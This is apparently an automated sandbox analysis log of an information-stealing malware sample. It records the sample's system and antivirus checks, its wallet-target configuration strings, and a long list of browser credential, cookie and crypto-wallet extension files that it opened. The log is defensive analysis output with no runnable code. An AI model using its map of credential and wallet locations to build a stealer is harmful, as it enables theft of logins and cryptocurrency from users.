                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\OiMp3TH.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2290373903.000000000393C000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2287056981.0000000003943000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                Source: Yara match File source: Process Memory Space: ghhqoznpon_638708802577261661.exe PID: 6396, type: MEMORYSTR
                Source: Yara match File source: sslproxydump.pcap, type: PCAP
                Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000002.2361810684.000000000074C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: /JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum\\wal
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000002.2361810684.000000000074C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\\ElectronCash\\wallets","m":["*"],"z":"Wallets/ElectronCash","d":0
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000002.2361810684.000000000074C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: int.fp","simple-storage.json","window-state.json"],"z":"Wallets/Binance","d"
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000002.2361810684.000000000074C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":["*"],"z":h
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2266235038.000000000074A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: a%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":2097152t
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2238402687.000000000394F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ExodusWeb3
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2266235038.000000000074A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: um","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2266235038.000000000074A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
